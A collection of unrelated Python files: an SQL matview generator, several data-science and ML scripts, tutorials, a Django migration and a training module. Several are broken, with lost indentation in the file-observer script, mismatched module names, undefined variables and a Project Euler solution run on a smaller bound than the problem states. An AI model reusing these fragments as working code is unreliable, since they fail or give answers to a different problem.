        final_index = 'idx_' + RANDOM_CHARS + '__' + idx['name']
        final_names.append(final_index)
        create_indexes.append(create_index_string(matview_name, final_index + '_temp', idx))
        rename_old_indexes.append(
            TEMPLATE['rename_index'].format('IF EXISTS ', final_index, final_index + '_old'))
        rename_new_indexes.append(
            TEMPLATE['rename_index'].format('', final_index + '_temp', final_index))
    if len(final_names) != len(set(final_names)):
        raise Exception('Name collision detected. Examine JSON file')
    print('There are {} index creations'.format(len(create_indexes)))
    return create_indexes, rename_old_indexes, rename_new_indexes
def make_modification_sql(matview_name):
    """Post-creation statements: optional CLUSTER (when an index was
    flagged cluster_on_this), then ANALYZE and a read-only grant."""
    global CLUSTERING_INDEX
    statements = []
    if CLUSTERING_INDEX:
        print('*** This matview will be clustered on {} ***'.format(CLUSTERING_INDEX))
        statements.append(TEMPLATE['cluster_matview'].format(matview_name, CLUSTERING_INDEX))
    statements.append(TEMPLATE['analyze'].format(matview_name))
    statements.append(TEMPLATE['grant_select'].format(matview_name, 'readonly'))
    return statements
def make_rename_sql(matview_name, old_indexes, new_indexes):
    """Statements swapping the _temp matview into place: archive the live
    matview and its indexes under _old names, then promote the _temp
    matview and its indexes to the final names."""
    archive = [TEMPLATE['rename_matview'].format('IF EXISTS ', matview_name, matview_name + '_old')]
    archive += old_indexes
    archive.append('')
    promote = [TEMPLATE['rename_matview'].format('', matview_name + '_temp', matview_name)]
    promote += new_indexes
    return archive + promote
def create_all_sql_strings(sql_json):
    """Assemble the complete monolithic SQL script, in order:

    1. banner header
    2. drop leftover _temp/_old matviews
    3. create the new _temp matview
    4. create its indexes (as _temp names)
    5. rename swap (archive live objects as _old, promote _temp)
    6. post-creation steps (optional cluster, analyze, grant)

    Sections are separated by blank lines.
    """
    matview_name = sql_json['final_name']
    create_indexes, rename_old, rename_new = make_indexes_sql(sql_json, matview_name + '_temp')
    sections = [
        make_sql_header(),
        make_matview_drops(matview_name),
        [''],
        make_matview_create(matview_name, sql_json['matview_sql']),
        [''],
        create_indexes,
        [''],
        make_rename_sql(matview_name, rename_old, rename_new),
        [''],
        make_modification_sql(matview_name),
    ]
    return [line for section in sections for line in section]
def write_sql_file(str_list, filename):
    """Write *str_list* (newline-joined, with a trailing newline) to
    filename + '.sql'. When OVERWRITE_FILE is False, append an increasing
    sequence number rather than clobbering an existing file."""
    fname = filename + '.sql'
    if not OVERWRITE_FILE:
        sequence = 0
        while os.path.isfile(fname):
            sequence += 1
            fname = filename + str(sequence) + '.sql'
    print('Creating file: {}'.format(fname))
    with open(fname, 'w') as f:
        f.write('\n'.join(str_list) + '\n')
def create_componentized_files(sql_json):
    """Write the generation SQL as separate per-step files under
    DEST_FOLDER/componentized/: __drops, __matview, __indexes, __mods,
    __renames, and (when the spec requests it) __refresh. Each file gets
    the standard banner header."""
    filename_base = DEST_FOLDER + 'componentized/' + sql_json['final_name']
    matview_name = sql_json['final_name']
    matview_temp_name = matview_name + '_temp'
    create_indexes, rename_old_indexes, rename_new_indexes = make_indexes_sql(sql_json, matview_temp_name)
    # final_sql_strings.extend(make_sql_header())
    # final_sql_strings.extend(make_matview_drops(matview_name))
    sql_strings = make_sql_header() + make_matview_drops(matview_name)
    write_sql_file(sql_strings, filename_base + '__drops')
    sql_strings = make_sql_header() + make_matview_create(matview_name, sql_json['matview_sql'])
    write_sql_file(sql_strings, filename_base + '__matview')
    sql_strings = make_sql_header() + create_indexes
    write_sql_file(sql_strings, filename_base + '__indexes')
    # NOTE: unlike the monolith, the mods file targets the FINAL matview
    # name (see commented-out line below that used matview_temp_name).
    sql_strings = make_sql_header() + make_modification_sql(matview_name)
    write_sql_file(sql_strings, filename_base + '__mods')
    sql_strings = make_sql_header() + make_rename_sql(matview_name, rename_old_indexes, rename_new_indexes)
    write_sql_file(sql_strings, filename_base + '__renames')
    # Optional refresh step, only when the JSON spec sets "refresh": true.
    if 'refresh' in sql_json and sql_json['refresh'] is True:
        sql_strings = make_sql_header() + make_matview_refresh(matview_name)
        write_sql_file(sql_strings, filename_base + '__refresh')
    # final_sql_strings.append('')
    # final_sql_strings += create_indexes
    # final_sql_strings.append('')
    # final_sql_strings.extend(make_modification_sql(matview_temp_name))
    # final_sql_strings.append('')
    # final_sql_strings.extend(make_rename_sql(matview_name, rename_old_indexes, rename_new_indexes))
    # final_sql_strings.append('')
def create_monolith_file(sql_json):
    """Write every SQL statement for the matview into a single .sql file."""
    statements = create_all_sql_strings(sql_json)
    name = sql_json['final_name']
    print('Preparing to store "{}" in sql file'.format(name))
    write_sql_file(statements, DEST_FOLDER + name)
def main(source_file):
    """Ingest a matview JSON definition and emit both SQL layouts.

    Exits the process if the source file cannot be parsed.
    """
    try:
        sql_json = ingest_json(source_file)
    except Exception as err:
        # Surface the parse/IO problem, then abort — nothing can be generated.
        print(err)
        raise SystemExit
    create_monolith_file(sql_json)
    create_componentized_files(sql_json)
    print('Done')
if __name__ == '__main__':
    # With an explicit path argument, process just that JSON file.
    if len(sys.argv) > 1:
        print('Creating matview SQL using {}'.format(sys.argv[1]))
        main(sys.argv[1])
    else:
        # Interactive fallback: offer to process every *.json in the cwd.
        ans = input('Would you like to run on all json files in dir? (y/N): ')
        if ans.lower() in ['y', 'yes']:
            all_files = glob.glob('*.json')
            for f in all_files:
                # Regenerated per input file; presumably consumed by the SQL
                # generators (e.g. temp-object naming) — TODO confirm.
                RANDOM_CHARS = str(uuid4())[:8]
                print('\n==== {}'.format(f))
                main(f)
        else:
            print('Quitting....\n')
|
#!/usr/bin/env python2.7
"""
Ted Satcher
CS 640
Fall 2012
Final Exam
File: problem4.py
This executable is for Problem 4 for the final exam.
It uses the Parzen window approach to calculate
an estimated density function from a collection
of sample patterns.
"""
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import parzen_window as pw
import make_data as md
def main():
    """Run the Parzen-window density estimation for both window types."""
    data_file = 'p4.data'
    # Flatten whatever read_data returns into a one-dimensional sample array.
    samples = np.array(md.read_data(data_file)).squeeze()
    window_size = 1
    # (window factory, console banner, plot title, output figure path)
    experiments = [
        (pw.zero_one, "Zero-one window function...", "Zero-One Window", "images/zero-one.eps"),
        (pw.gauss, "Gauss window function...", "Gauss Window", "images/gauss.eps"),
    ]
    for make_window, banner, title, outfile in experiments:
        phi = make_window(window_size)
        print(banner)
        plot_data(phi, samples, title, outfile)
def plot_data(phi, data, mytitle, fnm):
    """Estimate and plot the density for several sample sizes.

    For each sample size a density function is fitted on a prefix of ``data``
    with window function ``phi``, evaluated over a fixed x range, and drawn
    into one shared figure which is then displayed.

    NOTE(review): ``fnm`` (an output figure path) is accepted but never used —
    the figure is only shown, not saved; confirm whether savefig was intended.
    """
    xs = np.linspace(-4, 10, 100)  # evaluation grid for plotting
    for size in (100, 1000, 10000):
        density = pw.density_function(phi, data[0:size])
        print("Plotting density for a sample size of", size)
        ys = np.array([density(xv) for xv in xs])
        plt.plot(xs, ys, label=str(size))
    plt.legend(fancybox=True, title="Sample Size", shadow=True)
    plt.title(mytitle, fontsize=18)
    plt.xlabel("x", fontsize=16)
    plt.ylabel("p(x)", fontsize=16)
    plt.show()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 30 15:48:13 2018
@author: brian
"""
import seaborn as sns
########Correlation Matrix
# Exploratory analysis script: draws Seaborn correlation heatmaps for several
# column subsets of `dfMaster`.
# NOTE(review): `dfMaster`, `df` and `pd` are not defined/imported in this
# file — presumably they existed in the interactive session this was run in;
# confirm before running standalone.
#Seaborn's heatmap version:
df3 = dfMaster
# NOTE(review): `df1` is only assigned further below — in a fresh session this
# line raises NameError; it likely should read `df3.corr()`. Left unchanged.
corr = df1.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
pd.set_option('display.max_columns', 25)
# Full feature subset (vegetation indices, climate vars, z-scores).
df1= dfMaster[[ u'Latitude', u'Longitude', u'month',
       u'year', u'NDVI', u'EVI',
       u'NDWI1',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
       u'daysabove28', u'daysabove35', u'eto', u'zVPD', u'zP', u'zETO',
       u'zSRAD', u'zETR', u'ztmmn', u'ztmmx', u'zcum_daysinarow_lowpr',
       u'zdaysabove30']]
#          u'NDWI2', u'NDVImean', u'NDVIstd', u'EVImean', u'EVIstd',
#        u'NDWI1mean', u'NDWI2mean', u'NDWI1std', u'NDWI2std', u'zNDVI', u'zEVI',
corr = df1.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
# Same heatmap without the month/year/EVI/NDWI1 columns.
df2= dfMaster[[ u'Latitude', u'Longitude',
       u'NDVI',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
       u'daysabove28', u'daysabove35', u'eto', u'zVPD', u'zP', u'zETO',
       u'zSRAD', u'zETR', u'ztmmn', u'ztmmx', u'zcum_daysinarow_lowpr',
       u'zdaysabove30']]
corr = df2.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
# April only, restricted to well-vegetated pixels (NDVI > 0.4).
dfapril = dfMaster.loc[(dfMaster.month==4)]
dfapril= dfapril[[ u'Latitude', u'Longitude',
       u'NDVI', 'EVI',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
       u'daysabove28', u'daysabove35']]
dfapril = dfapril.loc[(dfapril.NDVI >.4)]
corr = dfapril.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
# May only.
dfmay = dfMaster.loc[(dfMaster.month==5)]
dfmay= dfmay[[ u'Latitude', u'Longitude',
       u'NDVI', 'EVI',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
       u'daysabove28', u'daysabove35']]
corr = dfmay.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
# NOTE(review): despite the name, this re-uses `dfmay` for an NDVI > 0.4
# filter over ALL months (no month mask) — confirm that is intentional.
dfmay = dfMaster.loc[(dfMaster.NDVI>.4)]
dfmay= dfmay[[ u'Latitude', u'Longitude',
       u'NDVI', 'EVI', 'zNDVI',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'daysbelowneg5', u'pr','avgtemp', u'daysabove30',
       u'daysabove28', u'daysabove35']]
corr = dfmay.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
# NOTE(review): `df` is undefined in this file; presumably a July/winter
# subset built elsewhere in the session — confirm.
dfjulywinter= df[[
       u'NDVI', 'EVI', 'zNDVI',
       u'srad', u'etr', u'tmmx', u'tmmn', u'vpd',
       u'cum_daysinarow_lowpr', u'pr','avgtemp',
       u'daysabove28']]
corr = dfjulywinter.corr()
sns.heatmap(corr,
            xticklabels=corr.columns.values,
            yticklabels=corr.columns.values,
            center=0, cmap='seismic')
|
# It turns out that 12 cm is the smallest length of wire that can be bent to form an integer sided right angle triangle in exactly one way, but there are many more examples.
# 12 cm: (3,4,5)
# 24 cm: (6,8,10)
# 30 cm: (5,12,13)
# 36 cm: (9,12,15)
# 40 cm: (8,15,17)
# 48 cm: (12,16,20)
# In contrast, some lengths of wire, like 20 cm, cannot be bent to form an integer sided right angle triangle, and other lengths allow more than one solution to be found; for example, using 120 cm it is possible to form exactly three different integer sided right angle triangles.
# 120 cm: (30,40,50), (20,48,52), (24,45,51)
# Given that L is the length of the wire, for how many values of L ≤ 1,500,000 can exactly one integer sided right angle triangle be formed?
############
# Solution #
############
# How many unique integer solutions to aa + bb == cc, where
# a < b < c?
from math import gcd

def count_single_triangle_perimeters(limit):
    """Return how many perimeters p (1 <= p < limit) admit exactly one
    integer-sided right triangle with a < b < c and a + b + c == p.

    Replaces the original O(limit^3) brute force with Euclid's formula:
    every primitive Pythagorean triple is (m*m - n*n, 2*m*n, m*m + n*n)
    for m > n >= 1 with gcd(m, n) == 1 and m - n odd, and its perimeter is
    2*m*(m + n).  Every triple is an integer multiple of a primitive one,
    so marking all multiples of each primitive perimeter counts every
    triangle.  Overall cost is roughly O(limit log limit).
    """
    counts = [0] * limit
    m = 2
    # The smallest perimeter for a given m occurs at n = 1: 2*m*(m + 1).
    while 2 * m * (m + 1) < limit:
        for n in range(1, m):
            # Primitivity needs coprime m, n of opposite parity.
            if (m - n) % 2 == 1 and gcd(m, n) == 1:
                perimeter = 2 * m * (m + n)
                if perimeter >= limit:
                    break  # perimeter grows with n, so later n are larger too
                for p in range(perimeter, limit, perimeter):
                    counts[p] += 1
        m += 1
    return sum(1 for c in counts if c == 1)

# Same search bound as the original brute force (perimeters up to L - 1);
# the faster algorithm would also handle the full 1,500,000 of the problem.
L = 1200
print(count_single_triangle_perimeters(L))
def series_sum(num):
    """Return the sum of 1/i**3 for i from 2 through num.

    Returns 0 when num < 2 (empty series).  The accumulator is named
    ``total`` rather than ``sum`` to avoid shadowing the builtin.
    """
    total = 0
    for i in range(2, num + 1):
        total = total + (1 / (i * i * i))
    return total

if __name__ == '__main__':
    # Same interactive behaviour as before, but guarded so that importing
    # this module does not block on stdin.
    num = int(input("Enter the number"))
    print("Sum of series is", series_sum(num))
import numpy
import pandas
import ROOT
from keras.models import Sequential
from keras.layers import Dense
from keras.wrappers.scikit_learn import KerasRegressor
from sklearn.cross_validation import cross_val_score
#from sklearn.model_selection import cross_val_score
from sklearn.cross_validation import KFold
#from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
# Train two small Keras regressors for the di-tau mass (hadronic-only and
# all-decays datasets) and store the predicted-mass histograms in a ROOT file.
myfile = ROOT.TFile("regditaumass.root","RECREATE")
#load dataset
# NOTE(review): header=None means the CSVs are assumed headerless with the
# target in column 5 — confirm against the files' actual layout.
dataframe_mass_train = pandas.read_csv("train_reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass_train = dataframe_mass_train.values
dataframe_mass_test= pandas.read_csv("test_reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass_test = dataframe_mass_test.values
dataframe_mass= pandas.read_csv("reg_ditau_mass.csv",delim_whitespace=False,header=None)
dataset_mass = dataframe_mass.values
dataframe_mass_train_all = pandas.read_csv("train_reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_train_all = dataframe_mass_train_all.values
dataframe_mass_test_all= pandas.read_csv("test_reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_test_all = dataframe_mass_test_all.values
dataframe_mass_all= pandas.read_csv("reg_ditau_mass_all.csv",delim_whitespace=False,header=None)
dataset_mass_all = dataframe_mass_all.values
# split into input and output variables
# Columns 0-4 are the features; column 5 is the regression target.
train_input = dataset_mass_train[:,0:5]
train_output = dataset_mass_train[:,5]
test_input = dataset_mass_test[:,0:5]
test_output = dataset_mass_test[:,5]
mass_input = dataset_mass[:,:]
train_input_all = dataset_mass_train_all[:,0:5]
train_output_all = dataset_mass_train_all[:,5]
test_input_all = dataset_mass_test_all[:,0:5]
test_output_all = dataset_mass_test_all[:,5]
mass_input_all = dataset_mass_all[:,:]
#histogram of ditau mass with regression only hadronic decays
histditaumassreg = ROOT.TH1D("ditaumassreg","di-#tau mass using regression hadronic decays",100,0,100)
histditaumassreg.GetXaxis().SetTitle("di-#tau mass [GeV]")
histditaumassreg.GetYaxis().SetTitle("number of occurence")
#histogram of ditau mass with regression all particles
histditaumassregall = ROOT.TH1D("ditaumassregall","di-#tau mass using regression all decays",100,0,100)
histditaumassregall.GetXaxis().SetTitle("di-#tau mass [GeV]")
histditaumassregall.GetYaxis().SetTitle("number of occurence")
# Minimal 5->5->1 MLP regressor for the hadronic-decay dataset.
mass_model = Sequential()
mass_model.add(Dense(5,input_dim=5,kernel_initializer='normal',activation='relu'))
mass_model.add(Dense(1,kernel_initializer='normal'))
mass_model.compile(loss='mean_squared_error',optimizer='adam')
mass_model.fit(train_input,train_output,batch_size=5,epochs=100,verbose=0)
mass_score = mass_model.evaluate(test_input,test_output,verbose=0)
ditaumass = mass_model.predict(mass_input,batch_size=5,verbose=0)
# Identical architecture, trained on the all-decays dataset.
mass_model_all = Sequential()
mass_model_all.add(Dense(5,input_dim=5,kernel_initializer='normal',activation='relu'))
mass_model_all.add(Dense(1,kernel_initializer='normal'))
mass_model_all.compile(loss='mean_squared_error',optimizer='adam')
mass_model_all.fit(train_input_all,train_output_all,batch_size=5,epochs=100,verbose=0)
mass_score_all = mass_model_all.evaluate(test_input_all,test_output_all,verbose=0)
ditaumass_all = mass_model_all.predict(mass_input_all,batch_size=5,verbose=0)
# predict() returns shape (N, 1); each `i` is a length-1 row that ROOT's
# Fill coerces to a float — presumably intentional, confirm.
for i in ditaumass:
    histditaumassreg.Fill(i)
for j in ditaumass_all:
    histditaumassregall.Fill(j)
#histogram of di-tau mass using regression hadronic decays
canv1 = ROOT.TCanvas("di-tau mass using regression hadronic")
histditaumassreg.Draw()
histditaumassreg.Write()
img1 = ROOT.TImage.Create()
img1.FromPad(canv1)
img1.WriteImage("reg_ditau_mass_hadronic.png")
#histogram of di-tau mass using regression all decays
canv2 = ROOT.TCanvas("di-tau mass using regression all decays")
histditaumassregall.Draw()
histditaumassregall.Write()
img2 = ROOT.TImage.Create()
img2.FromPad(canv2)
img2.WriteImage("reg_ditau_mass_all.png")
myfile.Close()
|
import os
import time
import math
import proddog.changeset
import proddog.observer
observDirectory = '/var/local/www/hostname'
modifiedPeriod = 60*60*48
checkPeriod = 10*60
excludeExtensions = ['png', 'log']
observer = prodcontrol.observer.Observer(observDirectory, modifiedPeriod, excludeExtensions)
changeset = prodcontrol.changeset.Changeset('.changeset')
while True:
os.system('cls' if os.name=='nt' else 'clear')
print "-"*50
print "[{0}]: started check\n".format(time.asctime( time.localtime(time.time()) ))
modifiedFiles = observer.run()
changesetList = []
for modifiedFile in modifiedFiles:
# updating changeset file
if changeset.hasChange(modifiedFile['filePath'], modifiedFile['modTimestamp']):
continue
changeset.addChange(modifiedFile['filePath'], modifiedFile['modTimestamp'])
changesetList.append(modifiedFile)
if len(changesetList) <= 0:
print "\t No new changes found"
# output changeset
for modifiedFile in changesetList:
# converting modTime seconds to human-readable text
modificationTime = ''
modHours = 0
modMinutes = 0
if int(modifiedFile['modTime']) > 3600:
modHours = int(modifiedFile['modTime'] / 3600)
if int(modifiedFile['modTime']) - modHours*3600 > 60:
modMinutes = int((modifiedFile['modTime'] - modHours*3600) / 60)
if modHours > 0:
modificationTime += str(modHours) + "h "
if modMinutes > 0:
modificationTime += str(modMinutes) + "m "
if int(modifiedFile['modTime']) - modHours*3600 - modMinutes*60 > 0:
modificationTime += str(int(modifiedFile['modTime']) - modHours*3600 - modMinutes*60) + "s"
# / converted
print "\t[{0}]: {1} (-{2})".format(modifiedFile['changeType'], modifiedFile['filePath'], modificationTime)
print "\n[{0}]: done".format(time.asctime( time.localtime(time.time()) ))
time.sleep(checkPeriod)
|
# Python has two kinds of loops.
# The first is the for...in loop, which iterates over each element of a
# list or tuple in turn. Example:
names = ['Michael', 'Bob', 'Tracy']
for name in names:
    print(name)
# Compute the sum of the integers 1-10.
# NOTE(review): the loop variable `sum` shadows the builtin of the same name.
sums = [1,2,3,4,5,6,7,8,9,10]
total = 0;
for sum in sums:
    total +=sum;
    pass;
print(total)
# To sum the integers 1-100, writing them all out would be tedious.
# Fortunately Python provides range(), which generates an integer sequence
# that list() can turn into a list. E.g. range(5) yields the integers from
# 0 up to (but not including) 5:
bugList = list(range(101));
total = 0 ;
for bigList in bugList:
    total+=bigList
    pass;
print(total)
# The second kind is the while loop: it keeps looping while the condition
# holds and exits when it no longer does.
# For example, summing all odd numbers below 100 with a while loop:
sum = 0
n = 99
while n > 0:
    sum = sum + n
    n = n - 2
print(sum)
# The same using for.
# NOTE(review): the loop variable `list` shadows the builtin of the same name.
list2 = list(range(100))
top=100
total = 0
print(list2)
for list in list2:
    if list%2!=0:
        total +=list;
    pass
print(total)
# break
# Inside a loop, break exits early. This would otherwise print 1..100:
n = 1;
while n<100:
    if n==10:
        break
    n+=1;
    print(n);
print('end')
# continue: print all the odd numbers by skipping the even ones.
n = 0;
flg = True;
while n<100:
    n+=1;
    if n%2==0:
        continue
    print(n);
print('end')
|
from xml.dom import minidom
# Python 2 script: parse '4.xml' from the working directory and dump the
# raw list of <ref> elements plus the XML of the first two of them.
# NOTE(review): assumes the document contains at least two <ref> elements,
# otherwise the indexing below raises IndexError.
xmldoc = minidom.parse('4.xml')
reflist = xmldoc.getElementsByTagName('ref')
print reflist
print
print reflist[0].toxml()
print
print reflist[1].toxml()
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module to run training and evaluation."""
import argparse
import os
import tensorflow as tf
from driblet.contrib.models.custom import input_functions
from driblet.contrib.models.custom import models
from driblet.contrib.models.custom.feature_transformer import utils
_FORWARD_FEATURES = 'forward_features'
_TARGET_FEATURE = 'target_feature'
_FEATURES_CONFIG_FILE = '/tmp/features_config.cfg'
def _parse_bool(value):
  """Parses a boolean command-line value.

  Using `type=bool` in argparse is a known pitfall: `bool('False')` is True
  because any non-empty string is truthy. This parser accepts the usual
  true/false spellings instead.

  Args:
    value: Raw command-line string (or an actual bool).

  Returns:
    The parsed boolean.

  Raises:
    argparse.ArgumentTypeError: If the value is not a recognized boolean.
  """
  if isinstance(value, bool):
    return value
  if value.lower() in ('true', 't', 'yes', 'y', '1'):
    return True
  if value.lower() in ('false', 'f', 'no', 'n', '0'):
    return False
  raise argparse.ArgumentTypeError('Boolean value expected, got %r.' % value)


def parse_arguments(argv=None):
  """Initializes command line parser using argparse.

  Args:
    argv: Optional list of argument strings to parse. Defaults to
      sys.argv[1:] when None, so existing zero-argument callers are
      unaffected.

  Returns:
    An argparse.Namespace with the parsed arguments.
  """
  parser = argparse.ArgumentParser()
  parser.add_argument(
      '--features_config_file',
      default=None,
      help='Path to features configuration file (.cfg)',
      type=str)
  # Flags related to input data.
  parser.add_argument(
      '--train_data',
      default=None,
      help='GCS or local paths to training data',
      nargs='+',
      type=str)
  parser.add_argument(
      '--eval_data',
      default=None,
      help='GCS or local paths to evaluation data',
      nargs='+',
      type=str)
  parser.add_argument(
      '--schema_file',
      default=None,
      help='File holding the schema for the input data',
      type=str)
  # Flags related to feature transformation.
  parser.add_argument(
      '--include_prediction_class',
      default=False,
      help='If set True, classification prediction output will include predicted classes.',
      # BUG FIX: was `type=bool`, under which any non-empty string
      # (including "False") parsed as True.
      type=_parse_bool)
  parser.add_argument(
      '--probability_output_key',
      default='probability',
      help='Key name for output probability value.',
      type=str)
  parser.add_argument(
      '--prediction_output_key',
      default='prediction',
      help='Key name for output prediction value.',
      type=str)
  # Flags related to model's output.
  parser.add_argument(
      '--transform_dir',
      default=None,
      help='Tf-transform directory with model from preprocessing step',
      type=str)
  # Flags related to training hyperparameters.
  parser.add_argument(
      '--job-dir',
      default=None,
      help='GCS location to write checkpoints and export models.',
      type=str)
  parser.add_argument(
      '--model_name', default=None, help='Name of the model to save.', type=str)
  parser.add_argument(
      '--estimator_type',
      default='Regressor',
      help='Type of the estimator. Should be one of [Regressor, '
      'CombinedRegressor, Classifier, CombinedClassifier].',
      type=str)
  parser.add_argument(
      '--train_steps',
      default=1000,
      help='Count of steps to run the training job for',
      type=int)
  parser.add_argument(
      '--train_batch_size', default=100, help='Train batch size.', type=int)
  parser.add_argument(
      '--eval_steps',
      default=100,
      help='Number of steps to run evaluation for at each checkpoint',
      type=int)
  parser.add_argument(
      '--eval_batch_size', default=50, help='Eval batch size.', type=int)
  parser.add_argument(
      '--num_epochs', default=1, help='Number of epochs.', type=int)
  parser.add_argument(
      '--first_layer_size',
      default=10,
      help='Size of the first layer.',
      type=int)
  parser.add_argument(
      '--num_layers', default=2, help='Number of NN layers.', type=int)
  parser.add_argument(
      '--save_checkpoints_steps',
      default=100,
      help='Save checkpoints every N steps.',
      type=int)
  parser.add_argument(
      '--keep_checkpoint_max',
      default=3,
      help='Maximum number of recent checkpoint files to keep.',
      type=int)
  parser.add_argument(
      '--exports_to_keep',
      default=1,
      help='Number of model exports to keep.',
      type=int)
  parser.add_argument(
      '--start_delay_secs',
      default=1,
      help='Start evaluating after N seconds.',
      type=int)
  parser.add_argument(
      '--throttle_secs', default=2, help='Evaluate every N seconds.', type=int)
  parser.add_argument(
      '--dnn_optimizer',
      default='Adam',
      help='Optimizer for DNN model.',
      type=str)
  parser.add_argument(
      '--dnn_dropout', default=0.1, help='Dropout value for DNN.', type=float)
  parser.add_argument(
      '--linear_optimizer',
      default='Ftrl',
      help='Optimizer for linear model.',
      type=str)
  parser.add_argument(
      '--learning_rate',
      default=0.001,
      help='Learning rate for the model.',
      type=float)
  return parser.parse_args(argv)
def train_and_evaluate(hparams) -> None:
  """Trains and evaluates the model.

  Stages: localize the features config (copying from GCS if needed), build
  train/eval input functions from tf-transform output, set up a serving
  exporter, construct the estimator, and run tf.estimator.train_and_evaluate.

  Args:
    hparams: An instance of HParams object describing the hyper-parameters for
      the model.
  Raises:
    RuntimeError: When features config file does not exist.
  """
  config_path = hparams.features_config_file
  # GCS paths can't be read by the config parser directly; copy to /tmp first.
  if config_path.startswith('gs://'):
    config_path = _FEATURES_CONFIG_FILE
    tf.io.gfile.copy(hparams.features_config_file, config_path, overwrite=True)
  if not os.path.isfile(config_path):
    raise RuntimeError('Features config `{}` not exist.'.format(config_path))
  features_config = utils.parse_features_config(config_path)
  # Training input reads the tf-transformed examples.
  train_input_fn = input_functions.get_input_fn(
      filename_patterns=hparams.train_data,
      tf_transform_dir=hparams.transform_dir,
      target_feature=features_config[_TARGET_FEATURE],
      forward_features=features_config[_FORWARD_FEATURES],
      num_epochs=hparams.num_epochs,
      batch_size=hparams.train_batch_size)
  train_spec = tf.estimator.TrainSpec(
      input_fn=train_input_fn, max_steps=hparams.train_steps)
  eval_input_fn = input_functions.get_input_fn(
      filename_patterns=hparams.eval_data,
      tf_transform_dir=hparams.transform_dir,
      target_feature=features_config[_TARGET_FEATURE],
      forward_features=features_config[_FORWARD_FEATURES],
      num_epochs=hparams.num_epochs,
      batch_size=hparams.eval_batch_size)
  # Serving receiver applies the same tf-transform graph to raw examples.
  schema_file = utils.read_schema(hparams.schema_file)
  raw_feature_spec = utils.get_raw_feature_spec(schema_file,
                                                tf.estimator.ModeKeys.TRAIN)
  serving_receiver_fn = lambda: input_functions.example_serving_receiver_fn(
      hparams.transform_dir, raw_feature_spec, features_config[_TARGET_FEATURE],
      features_config[_FORWARD_FEATURES])
  exporter = tf.estimator.LatestExporter(
      name=hparams.model_name,
      serving_input_receiver_fn=serving_receiver_fn,
      exports_to_keep=hparams.exports_to_keep)
  eval_spec = tf.estimator.EvalSpec(
      input_fn=eval_input_fn,
      steps=hparams.eval_steps,
      start_delay_secs=hparams.start_delay_secs,
      throttle_secs=hparams.throttle_secs,
      exporters=[exporter])
  estimator = models.create_estimator(
      features_config=features_config,
      job_dir=hparams.job_dir,
      first_layer_size=hparams.first_layer_size,
      num_layers=hparams.num_layers,
      estimator_type=hparams.estimator_type,
      linear_optimizer=hparams.linear_optimizer,
      dnn_optimizer=hparams.dnn_optimizer,
      dnn_dropout=hparams.dnn_dropout,
      learning_rate=hparams.learning_rate,
      save_checkpoints_steps=hparams.save_checkpoints_steps,
      keep_checkpoint_max=hparams.keep_checkpoint_max,
      include_prediction_class=hparams.include_prediction_class,
      probability_output_key=hparams.probability_output_key,
      prediction_output_key=hparams.prediction_output_key)
  tf.estimator.train_and_evaluate(
      estimator=estimator, train_spec=train_spec, eval_spec=eval_spec)
def main() -> None:
  """Entry point: quiets TF logging, then runs training with CLI arguments."""
  tf.get_logger().setLevel('ERROR')
  train_and_evaluate(parse_arguments())


if __name__ == '__main__':
  main()
|
class Script:
    """Prints two entries of the month-number sequence 1..12."""

    @staticmethod
    def main():
        # months[i] holds the 1-based month number at index i.
        months = list(range(1, 13))
        index_four = months[4]      # fifth entry: 5
        last_value = months[-1]     # final entry: 12
        print(str(index_four))
        print(str(last_value))

Script.main()
# -*- coding: utf-8 -*-
# Generated by Django 1.9.10 on 2016-10-11 09:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django 1.9 migration: relaxes
    # SubCategory.child_category to be nullable and survive deletion of the
    # referenced Category (SET_NULL instead of cascading).

    dependencies = [
        ('pjt_inventory', '0027_auto_20161011_1358'),
    ]

    operations = [
        migrations.AlterField(
            model_name='subcategory',
            name='child_category',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='children', to='pjt_inventory.Category'),
        ),
    ]
|
# -*- coding: utf-8 -*-

"""
voicetools library
=====================

Package initializer: exposes the library metadata and re-exports the
public API (service clients, base client, utils, and exception types).
"""

# Package metadata.
